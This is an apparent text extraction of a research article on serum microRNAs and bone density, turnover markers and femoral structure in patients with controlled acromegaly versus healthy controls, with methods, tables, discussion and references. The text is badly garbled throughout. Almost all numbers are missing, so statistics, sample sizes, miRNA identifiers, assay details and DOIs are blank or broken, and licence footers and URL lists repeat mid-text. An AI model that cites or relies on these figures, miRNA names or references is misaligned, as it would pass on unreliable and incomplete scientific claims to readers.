study. a fragility fracture was defined as any low-energy fracture, excluding those of the hands, feet and skull. patients and controls with malignancies, inflammatory disorders, kidney or liver dysfunctions were also excluded from the study. consent has been obtained from each patient or subject after full explanation of the purpose and nature of all procedures used. this study was approved by the ethical committee of our institution (ceic-iib santpau). biochemical measurements serum igf concentrations were measured by an enzyme immunoassay (mediagnost, reutlingen/germany) with a sensitivity of . ng/ml. the intra- and inter- assay coefficients of variation (cvs) were . and . %, respectively. in the study, igf-i is expressed as sd score (sds). growth hormone (gh), osteocalcin, carboxy- terminal collagen crosslinks (ctx) and total procollagen type amino-terminal propeptide (p np) were measured by electrochemiluminescent immunoassay (cobas e ; roche diagnostics gmbhm). imprecision for mean gh values between . and μg/l was – . %, for osteocalcin concentrations between . and μg/l was – . %, for β-crosslaps concentrations between . and . μg/l was . – . % and for total p np values between . and μg/l was . – . %. sensitivity was . μg/l for gh, . μg/l for osteocalcin, . μg/l for ctx and μg/l for p np. serum -hydroxyvitamin d (vitamin d) concentrations were determined using an enzyme immunoassay (ids, boldon, uk), with a sensitivity of . ng/ml. imprecision for mean vitamin d values between and . ng/ml was . – . %. serum pth concentrations were measured by electrochemiluminescent immunoassay (cobas e ; roche diagnostics gmbhm). imprecision for mean pth values between . and pg/ml was . – . %. serum osteoprotegerin (opg) concentrations were measured by an enzyme-linked immune-sorbent assay (abcam), with a sensitivity < pg/ml and range between . and pg/ml. both serum dickkopf-related protein (dkk ) and sclerostin (sost) concentrations were measured using an enzyme immunoassay (biomedica, vienna, austria). both intra- and inter-assay cvs for dkk were % and the sensitivity was . pmol/l. intra- and inter- assay cvs for sost were < and < %, respectively; sensitivity was . pmol/l. serum osteoprotegerin concentrations were measured using an enzyme- linked immune-sorbent assay (biomedica). intra- and interassay cvs were < and < %, respectively; sensitivity was . pmol/l. radiological imaging areal bmd (abmd) was measured by dual-energy x-ray absorptiometry scanning (hologic discovery dxa system, hologic, bedford, ma, usa). the cv was %. patients had the lumbar spine and femoral neck scanned. the scan acquisition and analysis were performed by a certified and experimented technician and were performed according to the iscd standards. (http://www. iscd.org/documents/ / / -iscd-adult-official- positions.pdf). trabecular bone score was acquired from the lumbar spine dxa image automatically by the tbs insight software, medimaps group sa, geneva, switzerland. this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access http://www.iscd.org/documents/ / / -iscd-adult-official-positions.pdf http://www.iscd.org/documents/ / / -iscd-adult-official-positions.pdf http://www.iscd.org/documents/ / / -iscd-adult-official-positions.pdf https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com e valassi et al. mirnas and bone in acromegaly pb– : quantitative computed tomography (qct) was performed using a phillips brilliance scanner. participants were positioned supine on the scanner table, lying on top of a solid calibration phantom which covered levels l –l (mindways software, inc. austin, tx, usa). spine volumetric bmd was calculated as the mean of the values at l , l and l (expressed as ls vbmd). to measure femoral vbmd, all the scans were acquired from the acetabulum directly above the femoral head down to cm below the lesser trochanter, resulting in – slices, with mm slice thickness, over a range of – cm. all scans were performed at kv and to mas depending on height and weight of the patient, according to the mindways technical specifications. the images were processed and analyzed using qct-pro software version . . and the qct-pro bone investigational toolkit version . (bit, mindways software, inc.) by the same physician (jm). volumetric bmd was obtained from the hip qct analysis performing the following automated steps: (a) extraction of the proximal femur and (b) rotation and segmentation of bone voxels from soft tissue in three planes (axial, sagittal and coronal). for each scan at each time point, a fixed threshold ( mg/cm ) was used to discriminate cortical from trabecular compartment ( ). mechanical properties were obtained using the bit software. a sliced narrow neck (nn) analysis was performed and the mechanical properties (buckling ratio (br), cross-sectional area (csa; cm ) and average cortical thickness (act, cm)) were the mean value of the nn series results. nn consists of nine slices of the femoral neck; the average of the slice structural results was used to perform the analysis. mirna isolation from serum samples rna extraction was conducted at exiqon services, denmark. serum samples were centrifuged at g for min at °c. an aliquot of μl per sample was transferred to a fluidx tube and μl of lysis solution bf containing μg carrier-rna per μl lysis solution bf and rna spike-in template mixture was added to the sample and mixed for min and incubated for min at room temperature, followed by addition of μl protein precipitation solution bf. total rna was extracted from the samples using mircury rna isolation kit – biofluids; high-throughput bead-based protocol v. (exiqon, vedbaek, denmark) in an automated -well format. the purified total rna was eluted in a final volume of μl. the rna was stored in a − °c freezer. mirna selection since very little information on mirnas in gh excess is available, the selection of mirnas to be measured in this study was based on previously published data evaluating the relationship between mirnas and bone phenotypes ( , , , ). mir- a- p, mir- a- p, mir- - p, mir- - p, mir- - p, mir- - - p, mir- - p, mir- - p and mir- b- p were selected based on a preliminary screening, which was performed in six patients and six controls using mircury lnatm universal rt microrna pcr serum/plasma focus panel (exiqon) (supplementary table  , see section on supplementary data given at the end of this article). mir- a and mir- a- p were included for hemolysis assessment of samples. microrna real-time qpcr mirna qpcr and further data analyses were conducted at exiqon services, denmark. using the mircury lna universal rt microrna pcr, polyadenylation and cdna synthesis kit (exiqon), μl rna was reverse transcribed in μl reactions. then, cdna was diluted × and assayed in μl pcr reactions according to the protocol for mircury lna universal rt microrna pcr; each microrna was assayed once by qpcr on the microrna ready-to-use pcr, custom pick and mix panel using exilent sybr green master mix. negative controls excluding template from the reverse transcription reaction was performed and profiled like the samples. the amplification was performed in a lightcycler real-time pcr system (roche) in - well plates. the amplification curves were analyzed using the roche lc software, both for determination of cq (by the nd derivative method) and for melting curve analysis. the amplification efficiency was calculated using algorithms similar to the linreg software. all assays were inspected for distinct melting curves and the tm was checked to be within known specifications for the assay. furthermore, assays must be detected with five cqs less than the negative control, and with cq < to be included in the data analysis. data that did not pass these criteria were omitted from any further analysis. cq was calculated as the nd derivative. using normfinder the best normalizer was found to be the average of assays detected in all samples. all data were normalized to the average of assays detected in all samples (average–assay cq). data quality control, unsupervised this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com e valassi et al. mirnas and bone in acromegaly : data analysis and student t-test with benjamini–hochberg correction were performed (corrected p values < . were accepted as significant). hemolysis assessment microrna contamination from hemolysis ( ) was assessed using mir- (expressed in red blood cells) and the mirna relatively stable in serum, mir- a. the ratio between these two micrornas correlates to degree of hemolysis. samples with ratios above . are considered as affected by hemolysis. statistical analysis the data are expressed as the mean ± s.d., except for data that were not normally distributed, in which case median values and ranges are reported. comparisons between two groups were performed using student’s t (gaussian distribution) and mann–whitney’s u (non-gaussian distribution) tests, depending on the data distribution. correlations were assessed using the pearson’s correlation coefficient or spearman rank order depending on whether the data were normally distributed. correlations were adjusted for age, sex, bmi and gonadal status by a stepwise multiple linear regression analysis. tests were two-tailed, and a p < . was considered significant. results clinical characteristics and bone parameters the characteristics of the study population are shown in table  . volumetric bone mineral density at lumbar spine (lsvbmd), as assessed by qct, was lower in acro patients as compared with healthy controls ( ± vs ± mg/cm ; p = . ). a reduction of cortical vbmd was also found in acro patients as compared with controls at the level of the total hip ( ± vs ± mg/cm ; p = . ), femoral neck ( ± vs ± mg/cm ; p = . ) and trochanter ( ( ) vs ( ) mg/cm ; p = . ). csa at the proximal femur was greater in acro than controls ( . ± vs ± cm , p = . ). when postmenopausal women were ruled out from the analysis, cortical vbmd at total hip and trochanter were still reduced in acro patients as compared with their healthy, eugonadal counterpart (total hip, ± vs ± mg/cm , p = . ; trochanter, ( ) vs ( ) mg/cm ; p = . ). when only postmenopausal women were compared, no differences in bone parameters were found. osteoprotegerin and dkk levels were significantly higher in acro as compared with controls ( . ± . vs . ± . pmol/l, p = . for osteoprotegerin; ± pmol/l vs ± pmol/l, p = . for dkk ). differentially expressed micrornas acro vs controls the hemolysis assessment of the samples showed no sign of red blood cell contamination. when comparing the acro group to the control group, the following mirnas were found to be differentially expressed: mir- a- p and mir- - p were overexpressed in acro patients, whereas mir - p and mir- - p were underexpressed in acro patients. mir- - p did not pass the benjamini– hochberg correction (table  ). relationship between serum mirnas and bone parameters significant correlations between differentially expressed mirnas and bone parameters in acro patients are shown in table  . mir- a- p levels were negatively associated with both trabecular vbmd at trochanter (r − . , p = . ) and serum opg concentrations (r − . , p = . ). levels of mir- a- p were also positively associated with vitamin d concentrations (r . , p = . ) and total csa (spearman’s rho . , p = . ). in contrast, levels of mir- - p were positively correlated with both trabecular vbmd at trochanter (r . , p = . ) and opg concentrations (r . , p = . ), but were negatively associated with vitamin d levels (r − . , p = . ). levels of mir- - p were positively correlated with osteocalcin concentrations (r . , p = . ). in controls (table  ), mir- a- p levels were positively associated with ctx concentrations (r . , p = . ) and tbs (r . , p = . ), and mir- - p levels were negatively associated with tbs (r − . , p = . ). levels of mir- - p were negatively associated with lumbar spine abmd (r − . , p = . ). no correlations were detected between mir- - p and bone parameters. mir- -a- p was negatively associated with mir- - p in both acro patients (r − . , p < . ) this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com e valassi et al. mirnas and bone in acromegaly pb– : and controls (r − . , p < . ). in controls only, mir- - p was negatively associated with mir- - p (r − . , p < . ). no correlations were found between any of the mirnas analyzed and the duration of either active or controlled disease. discussion we have demonstrated that levels of circulating mir- -a- p, mir- - p and mir- - p are differentially expressed in serum of patients with controlled acromegaly (acro) as compared with table  general, biochemical and bone characteristics of patients with controlled acromegaly (acro) and healthy controls. acro (n =  ) controls (n =  ) p valuea age (years)  ±   ±  . males/females / / bmi (kg/m )  ±   ±  . gh (µg/l) .  ±  . .  ±  . igf (ng/ml)  ±   ±  . igf sds .  ±  .  ±  . . bone markers  serum calcium (mg/dl) .  ±  .  ±  . .   (oh)d (ng/ml)  ±   ±  .  serum pth (pg/ml)  ±   ±  .  osteocalcin (ng/ml)  ±   ±  .  total p np (ng/ml)  ±   ±  .  ctx (ng/ml) .  ±  . .  ±  . .  osteoprotegerin (pmol/l) .  ±  . .  ±  . .  dkk (pmol/l)  ±   ±  .  sost (pmol/l)  ±   ±  . dxa parameters  lumbar t-score − .  ±  . − .  ±  . .  lumbar bmd .  ±  . .  ±  . .  femur t-score − .  ±  . − .  ±  .  femoral neck abmd .  ±  . .  ±  . .  total hip abmd .  ±  . .  ±  . . tbs .  ±  . .  ±  . . qct parameters  lumbar spine-vbmd  ±   ±  .  total hip-vbmd   trabecular  ±   ±  .   cortical  ±   ±  .  femoral neck-vbmd   trabecular  ±   ±  .   cortical  ±   ±  .  trochanteric-vbmd   trabecular  ±   ±  .   cortical ( ) ( ) .  intertrochanteric-vbmd   trabecular  ±   ±  .   cortical  ±   ±  . biomechanical parameters  csa total .  ±   ±  .  act .  ±  . .  ±  . .  br .  ±  . .  ±  . astudent’s t-test comparing patients with acromegaly vs healthy controls. (oh)d, -hydroxyvitamin d; act (average cortical thickness) is expressed as cm; bmi, body mass index; br, buckling ratio is unitless; csa, cross-sectional area is expressed as cm ; variables are expressed as mean (±s.d.) or median (interquartile range) depending upon the distribution; ctx, carboxy-terminal collagen crosslinks; dkk , dickkopf-related protein ; dxa, dual-energy x-ray absorptiometry; igf- , insulin-like growth factor-i; p np, type amino-terminal propeptide; pth, parathyroid hormone; qct, quantitative computed tomography; sost, sclerostin; tbs, trabecular bone score; vbmd, (volumetric bone mineral density) is expressed as mg/cm . statistically significant differences (p< . ) are marked in bold. this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com e valassi et al. mirnas and bone in acromegaly : age-, sex- and bmi-matched controls. moreover, we have found independent relationships between parameters of bone status and both mir- a- p and mir- - p levels that are exclusive for acro patients. as a matter of fact, patients with active acro present with a disproportionate increase in bone turnover, especially resorption, reduced spine and femoral vbmd at both trabecular and cortical compartment, altered trabecular microstructure and elevated fracture risk at lumbar spine ( , , , ). after remission of chronic gh/igf-i increase, patients with controlled acro maintain long-lasting impairment of trabecular microarchitecture, which is associated with persistently increased risk of vertebral fractures regardless of abmd ( , , ). interestingly, recent evidence suggests that the cortical compartment is also affected in acro patients with fragility vertebral fractures even long term after biochemical control ( , , , ). mechanisms underlying the detrimental effects of gh/igf-i excess on bone structure are multifactorial and still to be entirely elucidated ( ). the interaction of gh/igf-i with the rank-l/opg system may play a role in the regulation of bone metabolism. in particular, it has been suggested that igf-i may enhance osteoclastogenesis via stimulation of the rank-l, whereas gh may attenuate this effect by inducing opg synthesis ( ). of note, we have found that opg levels are greater in controlled acro patients compared with those in table  mirna expression levels in controlled acro patients and sex-, age- and bmi-matched controls. mirna acro controls fold change p value q value hsa-mir- a- p .  ±  . .  ±  . . < . . hsa-mir- - p − .  ±  . − .  ±  . − . < . . hsa-mir- - p − .  ±  . − .  ±  . . < . . hsa-mir- - p .  ±  . .  ±  . − . . . hsa-mir- a .  ±  . .  ±  . − . . . hsa-mir- - p .  ±  . .  ±  . − . . . hsa-mir- b- p − .  ±  . − .  ±  . − . . . hsa-mir- a- p − .  ±  . − .  ±  . . . . hsa-mir- - p − .  ±  . − .  ±  . − . . . hsa-mir- - p − .  ±  . − .  ±  . . . . hsa-mir- a- p − .  ±  . − .  ±  . − . . . hsa-mir- - p − .  ±  . − .  ±  . − . . . hsa-mir- - p − .  ±  . − .  ±  . − . . . hsa-mir- - p − .  ±  . −  ±  . − . . . hsa-mir- - p − .  ±  . − .  ±  . . . . hsa-mir- b- p − .  ±  . −  ±  . − . . . hsa-mir- b- p − .  ±  . −  ±  . − . . . hsa-mir- - - p − .  ±  . − .  ±  . . . . hsa-mir- a- p − .  ±  . − .  ±  . − . . . hsa-mir- - p .  ±  . − .  ±  . . . bold values indicate the mirnas that passed the false-discovery rate (fdr) for multiple comparisons (q value < . ). values shown are those with a nominal p value < . which was obtained using student’s t-test paired with data normalized by log transformation. q values were calculated as estimates of the multiple-testing fdr. acro, acromegaly; mirna, microrna. table  correlations between mirna expression and bone markers or bone parameters as assessed by dual-energy absorptiometry (dxa) and quantitative computed tomography (qct) in patients with acromegaly, after adjusting for age, sex, bmi and gonadal status. hsa-mir- a- p hsa-mir- - p hsa-mir- - p (oh)d (ng/ml) r . ; p =  . r − . ; p =  . osteocalcin (ng/ml) r . ; p =  . ctx (ng/ml) opg (pmol/l) r − . ; p =  . r . ; p =  . trochanteric trabecular vbmd r − . ; p =  . r . ; p =  . total csa (cm ) ρ . ; p =  . (oh)d, -hydroxyvitamind; bmd, bone mineral density; csa, cross-sectional area; ctx, carboxy-terminal collagen crosslinks; opg, osteoprotegerin; p np, total procollagen type amino-terminal propetide; tbs, trabecular bone score; vbmd, volumetric bone mineral density. this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com e valassi et al. mirnas and bone in acromegaly pb– : healthy subjects, as a possible compensatory mechanism, which counteracts increased bone resorption. constantin et al. reported no change in the rank-l/opg ratio after surgical control of acro as compared with baseline, suggesting sustained perturbations of this system despite hormone normalization ( ). inour study, mir- a- p, upregulated in acro, was negatively associated with opg and trabecular vbmd at the trochanter. it has been recently found that mir- a, which is expressed in both osteoblasts and osteoclasts of postmenopausal women, negatively regulates osteoblast differentiation and bone formation under mechanical loading, by repressing the expression of runx , a key transcriptional factor for osteogenesis ( , ). valenti et al. described a runx overexpression in mscs during both the active and controlled phase of the disease, which was also associated with bone quality impairment, as assessed through histomorphometric analyses ( ). as a matter of fact, both runx deletion and overexpression led to impaired bone formation ( , ). however, belaya et al. reported unchanged expression of runx in bone samples of active acro patients, whereas no studies have been published thus far on controlled acro patients ( ). it could be speculated that, in controlled patients, mir- a participates in this complex network of signals modulating both osteoclastogenesis and osteoblastogenesis, also through the regulation of the rank-l/opg system. in contrast with mir- a- p, the mir- - p, downregulated in acro patients, positively correlated with both trabecular vbmd at trochanter and opg. as far as we know, there is no information about the mir- - p’s role in bone tissue, and the present study shows, for the first time, an association between this mirna and bone. mir- a- p and mir- - p appear to have an opposite relationship with parameters of bone metabolism, including vitamin d. while , (oh) d levels have been described as normal or high during the active phase of the disease, its levels, as well as those of (oh)d, did not change after control of gh/igf-i excess ( , , ). our results suggest that mir- a- p and mir- - p could be potential markers of bone status and could predict the persistence of bone abnormalities in controlled acro patients. noteworthy, these mirs were related to bone measurements even in healthy subjects. in particular, there was an opposite relationship between mir and tbs, while mir- a- p was positively associated with ctx, a marker of bone resorption. such findings strengthen the hypothesis that mir- a- p and mir- - p play a physiological role in regulating bone homeostasis and, therefore, may represent potential signatures for bone deterioration under pathological conditions like gh/igf-i excess. we have also found that mir- - p was upregulated in our patients. however, we did not detect any relationships between its levels and any of the bone parameters we measured. we are not aware of any putative role of this mirnas in bone regulation and, therefore, we hypothesize that this finding may be independent of skeletal health. as we previously described, dkk levels were higher in acro patients as compared with controls, but no relationship was found between this wnt signaling inhibitor and any of the mirnas analyzed ( ). limitations of our study include small sample size and relative heterogeneity of our population. in particular, % of patients were in pharmacological remission and % received radiotherapy. it is currently not known whether pharmacological treatment of acro may cause independent skeletal actions on bone or interfere with mirna expression ( ). nevertheless, none of the mirnas described here have been reported as differentially expressed in gh-secreting pituitary adenomas from patients who are responders vs nonresponders to somatostatin analogs ( ). ten of our patients had also undergone radiotherapy previously, but biermasz et  al. demonstrated that previous pituitary irradiation was not associated with alteration of lumbar spine bmd in acro table  correlations between mirna expression and bone markers or bone parameters (as assessed by dxa or qct) in healthy subjects after adjusting for sex, age, bmi and gonadal status. hsa-mir- a- p hsa-mir- - p hsa-mir- - p ctx (ng/ml) r . ; p =  . lumbar spine abmd r − . ; p =  . tbs r . ; p =  . r − . ; p =  . abmd, areal bone mineral density; bmd, bone mineral density; ctx, carboxy-terminal collagen crosslinks; opg, osteoprotegerin; sost, sclerostin; tbs, trabecular bone score; vbmd, volumetric bone mineral density. this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com e valassi et al. mirnas and bone in acromegaly : patients in remission ( ). similarly, we could not assess the impact of comorbidities on mirna expression in our patients. another limitation of this study is its cross- sectional design, which prevents from inferring causality from our data. lack of information on vertebral fractures as well as lack of a group with active acromegaly are the other limitations of this study. since the source of the mirnas in serum is currently unknown, we cannot exclude that alterations of mirna expression may reflect specific actions in other tissues. mirnas are ubiquitous modulators controlling multiple patterns of gene expression and, therefore, may play a pathogenic role in several tissues and/or may be markers of more than one acro-related complication. indeed, acro is a multisystemic disease, which also seems to be associated with an elevated risk of malignancies ( ). it is intriguing to speculate that mir- a- p, mir- - p and mir- - p, which have been related to oncogenesis both in vitro and in vivo, may also be involved in the occurrence of tumors in acro patients ( , , , , , ). furthermore, associations of mirnas and bone parameters remained significant after adjusting for the gonadal status, suggesting that previous exposure to gh/ igf-i excess is the main determinant of bone impairment in patients with controlled acro, thus counteracting the negative effect of concomitant hypogonadism. indeed, madeira et  al. found deteriorated trabecular microarchitecture at both the distal radius and distal tibia, as assessed by high-resolution peripheral qct (hr-pqct), in eugonadal patients with controlled acro, as compared with their hypogonadal counterpart ( ). similarly, godang et  al. showed that tbs was reduced in acro eugonadal men after  year of hormone excess correction, but not in hypogonadal subjects ( ). moreover, another study reported no associations between the gonadal status of controlled acro patients and trabecular vbmd measurements across the proximal femur and also showed that controlled acro with normal gonadal function had lower vbmd at both total hip and intertrochanter as compared with controls ( ). in conclusion, we have described that some mirnas are differentially expressed in the serum of acro patients as compared with controls and are associated with both biochemical and structural parameters of bone metabolism. in particular, our data, which need to be confirmed in larger studies, suggest that mir- a- p and mir- - p may be promising biomarkers to evaluate the presence of bone disease in gh/igf-i excess and assess the persistence of bone impairment even after biochemical control has been reached. supplementary data this is linked to the online version of the paper at https://doi.org/ . / ec- - . declaration of interest the authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. funding this work was supported by grants from the instituto de salud carlos iii (fis pi / and pi / ), feder funds. acknowledgement a special thanks to all the patients and controls who accepted to participate in this research. the authors are indebted to ana maria marín and eulalia urgell for their technical assistance. references giustina a, mazziotti g & canalis e. growth hormone, insulin-like growth factors, and the skeleton. endocrine reviews – . (https://doi.org/ . /er. - ) olarescu nc, berryman de, householder la, lubbers er, list eo, benencia f, kopchick jj & bollerslev j. gh action influences adipogenesis of mouse adipose tissue-derived mesenchymal stem cells. journal of endocrinology – . (https://doi. org/ . /joe- - ) ueland t, olarescu nc, jorgensen ap, otterdal k, aukrust p, godang k, levka t & bollerslev j. increased serum and bone matrix levels of the secreted wnt antagonist dkk- in patients with growth hormone deficiency in response to growth hormone treatment. journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jc. - ) colao a, ferone d, marzullo p & lombardi g. systemic complications of acromegaly: epidemiology, pathogenesis and management. endocrine reviews – . (https://doi. org/ . /er. - ) dekkers om, biermasz nr, pereira am, romijn ja & vandenbroucke jp. mortality in acromegaly: a metaanalysis. journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jc. - ) madeira m, neto lv, de paula paranhos neto f, barbosa lima ic, carvalho de mendonça lm, gadelha mr & fleiuss de farias ml. acromegaly has a negative influence on trabecular bone, but not on cortical bone, as assessed by high-resolution peripheral quantitative computed tomography. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) maffezzoni f, maddalo m, frara s, mezzone m, zorza i, baruffaldi f, doglietto f, mazziotti g & maroldi r. high-resolution beam tomography analysis of bone microarchitecture in patients with acromegaly and radiological vertebral fractures. endocrine – . (https://doi.org/ . /s - - - ) valassi e, crespo i, malouf j, llauger j, aulinas a, marin am, biagetti b & webb sm. reduction of trabecular and cortical volumetric bone this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /ec- - https://doi.org/ . /ec- - https://doi.org/ . /er. - https://doi.org/ . /joe- - https://doi.org/ . /joe- - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /er. - https://doi.org/ . /er. - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /s - - - https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com e valassi et al. mirnas and bone in acromegaly pb– : mineral density at the proximal femur in patients with acromegaly. european journal of endocrinology – . (https://doi. org/ . /eje- - ) malgo f, hamdy nat, rebelink tj, kroon hm, claessen kmja, pereira am, biermasz nr & appelman-dijkstra nm. bone material strength index as measured by impact micriindentation is altered in patients with acromegaly. european journal of endocrinology – . (https://doi.org/ . /eje- - ) kocijan r, muschitz c, geiger e, skalicky s, baierl a, dormann r, plachel f, feichtinger x, heimel p, fahrleitner-pammer a, et al. circulating microrna signatures in patients with idiopathic and postmenopausal osteoporosis and fagility fractures. journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jc. - ) hassan mq, tye ce, stein gs & lian jb. non-coding rnas : epigenetic regulators of bone development and homeostasis. bone – . (https://doi.org/ . /j.bone. . . ) turchinovich a, weiz l & burwinker b. extracellular mirnas: the mistery of their origin and function. trends in biochemical sciences – . (https://doi.org/ . /j.tibs. . . ) gordon jar, montecino ma, aqueilan ri, stein jl, stein gs & lian jb. epigenetic pathways regulating bone homeostasis: potential targeting for intervention of skeletal disorders. current osteoporosis reports – . (https://doi.org/ . /s - - - ) cao z, moore bt, wang y, peng xh, lappe jm, recker rr & xiao p. mir- a as a potential cellular microrna biomarker for postmenopausal osteoporosis. plos one e . (https://doi. org/ . /journal.pone. ) li h, wang z, fu q & zhang j. plasma mirna levels correlate with sensitivity to bone mineral density in postmenopausal osteoporosis patients. biomarkers – . (https://doi.org/ . / x. . ) bedene a, mencej bedrač s, ješe l, marc j, vrtačnik p, preželj j, kocjan t, kranjc t, ostanek b mir- a the epigenetic regulator of bone homeostasis is increased in plasma of osteoporotic postmenopausal women. wiener klinische wochenschrift (supplement ) – . (https://doi.org/ . /s - - - ) seeliger c, karpinski k, haug, vester h, schmitt a, bauer js & van griensven m five freely circulating mirnas and bone tissue mirnas are associated with osteoporotic fractures. journal of bone and mineral research – . (https://doi.org/ . /jbmr. ) weilner s, skalicky s, salzer b, keider v, wagner f, hildner f, gabriel c, dovjak p, pietschmann p, grillari-voglauer r, et al. differentially circulating mirnas after recent osteoporotic fracture can influence osteogenic differentiation. bone – . (https://doi. org/ . /j.bone. . . ) panach l, mifsut d, tarín jj, cano a & garcia-pérez ma. serum circulating micrornas as biomarkers of osteoporotic fracture. calcified tissue international – . (https://doi. org/ . /s - - -z) heilmeier u, hackl m, skalicky s, weilner s, schroeder f, vierlinger k, patsch jm, baum t, oberbauer e, lobach i, et al. serum mirna signatures are indicative of skeletal fractures in postmenopausal women with and without type diabetes and influence osteogenic and adipogenic differentiation of adipose tissue-derived mesenchymal stem cells in vitro. journal of bone and mineral research – . (https://doi.org/ . /jbmr. ) yavropoulou mp, anastasilakis a, makras p, tsalikakis d, grammatiki m & yovos jg. expression of micrornas that regulate bone turnover in the serum of postmenopausal women with low bone mass and vertebral fractures. european journal of endocrinology – . (https://doi.org/ . /eje- - ) belaya z, grebennikova t, melnichenko ga, nikitin a, solodovnikov a, brovkina a, grigoriev a, rozhinskaya l, lutsenko a & dedov ll. effects of active acromegaly on bone mrna and microrna expression patterns. european journal of endocrinology – . (https://doi.org/ . /eje- - ) aulinas a, crespo i, vilades d, leta r, urgell e, biagetti b, webb sm & valassi e. cystatin-c and epicardial adipose tissue as noninvasive predictors of cardiovascular risk in acromegaly. clinical endocrinology – . (https://doi.org/ . /cen. ) giustina a, chanson p, bronstein md, klibanski a, lamberts s, casanueva ff, trainer p, ghigo e, ho k & melmed s. a consensus on criteria for cure of acromegaly. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) molitch me, clemmons dr, malozowski s, merriam gr & vance ml. evaluation and treatment of adult growth hormone deficiency: an endocrine society clinical practice guidelines. journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jc. - ) allison sj, poole kes, treece gm, gee ah, tonkin c, rennie wj, folland jp, summers gd & brooke-wavell k. the influence of high impact exercise on cortical and trabecular bone mineral content and d distribution across the proximal femur in older men: a randomised controlled unilateral intervention. journal of bone and mineral research – . (https://doi.org/ . /jbmr. ) zuo b, zhu j, li j, wang c, zhao x, cai g, li z, peng j, wang p & shen c, et al. microrna- a functions as a mechanosensitive microrna to inhibit bone formation through targeting runx . journal of bone and mineral research – . (https://doi. org/ . /jbmr. ) mao zg, sheng he d, zhou j, yao b, xiao w, chen ch, zhu yh & wang jj. differential expression of micrornas in gh secreting pituitary adenomas. diagnostic pathology . (https://doi. org/ . / - - - ) blondal t, jensby nielsen s, baker a, andreasen d, mouritzen p, wrang teilum m & dahlsveen ik. assessing sample and mirna profile quality in serum and plasma or other biofluids. methods s –s . (https://doi.org/ . /j. ymeth. . . ) mazziotti g, frara s & giustina a. pituitary diseases and bone. endocrine reviews – . (https://doi.org/ . /er. - ) dalle carbonare l, micheletti v, cosaro e, valenti mt, mottes m, francia g & daví mv. bone histomorphometry in acromegaly patients with fragility vertebral fractures. pituitary – . (https://doi.org/ . /s - - - ) mazziotti g, biagioli e, maffezzoni f, spinello m, serra v, maroldi r, floriani i & giustina a. bone turnover, bone mineral density, and fracture risk in acromegaly: a meta-analysis. journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jc. - ) lanzi r, losa m, villa i, gatti e, sirtori m, dal fiume c & rubinacci a. gh replacement therapy increases plasma osteoprotegerin levels in gh-deficient adults. european journal of endocrinology – . (https://doi.org/ . /eje. . ) constantin t, tangpricha v, shah r, oyesiku nm, ioachimescu oc, ritchie j & ioachimescu ag. calcium and bone turnover markers in acromegaly: a prospective, controlled study. journal of clinical endocrinology and metabolism – (https://doi. org/ . /jc. - ) de-ugarte l, serra-vinardell j, nonell l, belcells s, arnal m, nogues m, mellibovski l, grinberg d, diez-perez a & garcía-giralt n. expression profiling of micrornas in human bone tissue from postmenopausal women. human cell – . (https://doi. org/ . /s - - -y) valenti mt, mottes, m, cheri s, deiana m, micheletti v, corsaro e & daví mv, francia g & dalle carbonare l. runx overexpression this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /eje- - https://doi.org/ . /eje- - https://doi.org/ . /eje- - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /j.bone. . . https://doi.org/ . /j.tibs. . . https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /journal.pone. https://doi.org/ . /journal.pone. https://doi.org/ . / x. . https://doi.org/ . / x. . https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /jbmr. https://doi.org/ . /j.bone. . . 